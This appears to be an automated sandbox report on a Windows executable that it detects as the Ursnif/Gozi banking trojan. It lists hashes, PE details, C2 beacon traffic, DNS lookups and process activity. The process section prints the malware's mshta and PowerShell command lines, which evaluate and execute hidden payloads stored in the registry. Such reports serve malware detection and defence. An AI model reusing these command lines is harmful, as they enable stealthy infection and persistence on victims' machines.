
                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1b5r1h15.c2u.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:1

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmpv3qo3.pur.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:1

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.5154778279802725
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:main.exe
                          File size:37888
                          MD5:9676298f24c8cdd4b532ac027a00f60e
                          SHA1:8d0bd57712533f1a889627706925c17ed4347ce5
                          SHA256:0f5cce66023859e9d7e3f54b78e95bf09618db5ed01fe05b765d76ab156271da
                          SHA512:525b70896530a60cf58de64e8052ef2a8eb5ccc73d86fcd1f55d4850e682e3ff44c7ebc18ab029fc479b75a9a0083765c314c542b356d7ef8a7e7e493f13e7fd
                          SSDEEP:768:/QLm41fM01vAqyRrlpItKFyr8MS1g7/s1w70anLq:/L41fMSvXArbYVrO0/saLq
                          TLSH:9503E1967C6D152DDFDF82B22B2F618087392331565A50B4737F242F9A43D1B407B263
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y..+...x...x...x..lx...x...xQ..x...x...x..vx...x..kx...x..nx...xRich...x........PE..L.....%c............................/......

                          File Icon

                          Icon Hash:00828e8e8686b000

                          Static PE Info

                          General

                          Entrypoint:0x40182f
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x632596C9 [Sat Sep 17 09:43:37 2022 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:0
                          File Version Major:5
                          File Version Minor:0
                          Subsystem Version Major:5
                          Subsystem Version Minor:0
                          Import Hash:1640d668d1471f340cbe565fe63522f6

                          Entrypoint Preview

                          Instruction
                          push esi
                          xor esi, esi
                          push esi
                          push 00400000h
                          push esi
                          call dword ptr [0040203Ch]
                          mov dword ptr [00403160h], eax
                          cmp eax, esi
                          je 00007F42ECE959C7h
                          push esi
                          call dword ptr [00402008h]
                          mov dword ptr [00403170h], eax
                          call dword ptr [00402044h]
                          call 00007F42ECE955D9h
                          push dword ptr [00403160h]
                          mov esi, eax
                          call dword ptr [00402040h]
                          push esi
                          call dword ptr [00402048h]
                          pop esi
                          push ebp
                          mov ebp, esp
                          sub esp, 0Ch
                          push ebx
                          push esi
                          mov esi, eax
                          mov eax, dword ptr [00403180h]
                          mov ecx, dword ptr [esi+3Ch]
                          mov ecx, dword ptr [ecx+esi+50h]
                          lea edx, dword ptr [eax-69B24F45h]
                          not edx
                          lea ecx, dword ptr [ecx+eax-69B24F45h]
                          push edi
                          and ecx, edx
                          lea edx, dword ptr [ebp-08h]
                          push edx
                          lea edx, dword ptr [ebp-04h]
                          push edx
                          add eax, 964DA0FCh
                          push eax
                          push ecx
                          call 00007F42ECE95C2Dh
                          test eax, eax
                          jne 00007F42ECE959FCh
                          mov edi, dword ptr [ebp-04h]
                          push esi
                          push edi
                          call 00007F42ECE95D03h
                          mov ebx, eax
                          test ebx, ebx
                          jne 00007F42ECE959D8h
                          mov esi, dword ptr [edi+3Ch]
                          add esi, edi
                          push esi
                          call 00007F42ECE95424h
                          mov ebx, eax
                          test ebx, ebx
                          jne 00007F42ECE959C7h
                          push edi
                          mov eax, esi
                          call 00007F42ECE95F04h
                          mov ebx, eax
                          test ebx, ebx
                          jne 00007F42ECE959B9h
                          mov esi, dword ptr [esi+28h]
                          push eax
                          push 00000001h
                          add esi, edi
                          push edi
                          call esi
                          test eax, eax
                          jne 00007F42ECE959AAh
                          call dword ptr [0000202Ch]

                          Rich Headers

                          Programming Language:
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2008 SP1 build 30729

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x20e80x50.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x50000x10.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xd8.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x20000xa8.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x10000x1000False0.718017578125data6.515539058364033IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata0x20000x4c00x600False0.4635416666666667data4.488955985688776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0x30000x1940x200False0.056640625data0.12227588125913882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .bss0x40000x2dc0x400False0.7607421875data6.3016514258390215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0x50000x100x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x60000x80000x7200False0.9698807565789473data7.856350754061323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                          Imports

                          DLLImport
                          ntdll.dll_snwprintf, memset, NtQuerySystemInformation, _aulldiv
                          KERNEL32.dllGetModuleHandleA, GetLocaleInfoA, GetSystemDefaultUILanguage, HeapAlloc, HeapFree, WaitForSingleObject, Sleep, ExitThread, lstrlenW, GetLastError, VerLanguageNameA, GetExitCodeThread, CloseHandle, HeapCreate, HeapDestroy, GetCommandLineW, ExitProcess, SetLastError, TerminateThread, SleepEx, GetModuleFileNameW, CreateThread, OpenProcess, CreateEventA, GetLongPathNameW, GetVersion, GetCurrentProcessId, GetProcAddress, LoadLibraryA, VirtualProtect, MapViewOfFile, GetSystemTimeAsFileTime, CreateFileMappingW, QueueUserAPC
                          ADVAPI32.dllConvertStringSecurityDescriptorToSecurityDescriptorA

                          Network Behavior

                          Snort IDS Alerts

                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                          192.168.2.3134.0.118.20349698802033203 11/16/22-02:14:48.026105TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4969880192.168.2.3134.0.118.203
                          192.168.2.3134.0.118.20349698802033204 11/16/22-02:14:48.026105TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4969880192.168.2.3134.0.118.203

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Nov 16, 2022 02:14:25.396747112 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:25.457850933 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:25.458098888 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:25.458513021 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:25.519583941 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.472409964 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.472446918 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.472465038 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.472477913 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.472493887 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.472511053 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.472527027 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.472527981 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.472544909 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.472562075 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.472575903 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.472575903 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.472578049 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.472604990 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.472639084 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.533454895 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533502102 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533519030 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533530951 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533543110 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533555031 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533570051 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533586979 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533603907 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533620119 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533637047 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533652067 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533668041 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533684969 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533699036 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533715010 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533715010 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.533730030 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533746958 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533797979 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.533797979 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.533798933 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.533798933 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.539521933 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.539557934 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.539746046 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595025063 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595071077 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595088005 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595101118 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595113039 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595129967 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595146894 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595164061 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595181942 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595197916 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595215082 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595231056 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595247030 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595263004 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595278025 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595297098 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595314026 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595329046 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595345020 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595360994 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595371008 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595376968 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595371008 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595392942 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595408916 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595424891 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595442057 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595446110 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595446110 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595446110 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595457077 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595473051 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595485926 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595489979 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595505953 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595508099 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595520973 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595532894 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595536947 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595555067 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595556974 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595571995 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595587969 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595603943 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595618010 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595621109 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595618963 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595648050 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595669985 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.600761890 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.600799084 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.600816011 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.600830078 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.600982904 CET4969880192.168.2.3134.0.118.203

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Nov 16, 2022 02:13:04.754086018 CET5986953192.168.2.38.8.8.8
                          Nov 16, 2022 02:13:05.118052006 CET53598698.8.8.8192.168.2.3
                          Nov 16, 2022 02:14:25.358735085 CET5784053192.168.2.38.8.8.8
                          Nov 16, 2022 02:14:25.378199100 CET53578408.8.8.8192.168.2.3
                          Nov 16, 2022 02:15:18.869553089 CET5799053192.168.2.38.8.8.8
                          Nov 16, 2022 02:15:19.235027075 CET53579908.8.8.8192.168.2.3

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Nov 16, 2022 02:13:04.754086018 CET192.168.2.38.8.8.80xbfdfStandard query (0)lentaphoto.atA (IP address)IN (0x0001)false
                          Nov 16, 2022 02:14:25.358735085 CET192.168.2.38.8.8.80x8f7Standard query (0)iujdhsndjfks.ruA (IP address)IN (0x0001)false
                          Nov 16, 2022 02:15:18.869553089 CET192.168.2.38.8.8.80xe6a8Standard query (0)lentaphoto.atA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Nov 16, 2022 02:13:05.118052006 CET8.8.8.8192.168.2.30xbfdfServer failure (2)lentaphoto.atnonenoneA (IP address)IN (0x0001)false
                          Nov 16, 2022 02:14:25.378199100 CET8.8.8.8192.168.2.30x8f7No error (0)iujdhsndjfks.ru134.0.118.203A (IP address)IN (0x0001)false
                          Nov 16, 2022 02:15:19.235027075 CET8.8.8.8192.168.2.30xe6a8Server failure (2)lentaphoto.atnonenoneA (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • iujdhsndjfks.ru

                          Statistics

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:02:13:00
                          Start date:16/11/2022
                          Path:C:\Users\user\Desktop\main.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Desktop\main.exe
                          Imagebase:0x400000
                          File size:37888 bytes
                          MD5 hash:9676298F24C8CDD4B532AC027A00F60E
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.506994526.000000000112F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.506557066.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.470843781.0000000001429000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.484040297.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.470798619.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low

                          General

                          Target ID:14
                          Start time:02:14:57
                          Start date:16/11/2022
                          Path:C:\Windows\System32\mshta.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>W6wy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(W6wy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                          Imagebase:0x7ff7e7b90000
                          File size:14848 bytes
                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:15
                          Start time:02:14:59
                          Start date:16/11/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([System.Text.Encoding]::ASCII.GetString((fuuocwpse "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                          Imagebase:0x7ff6ce4b0000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          General

                          Target ID:16
                          Start time:02:14:59
                          Start date:16/11/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff745070000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Disassembly

                          No disassembly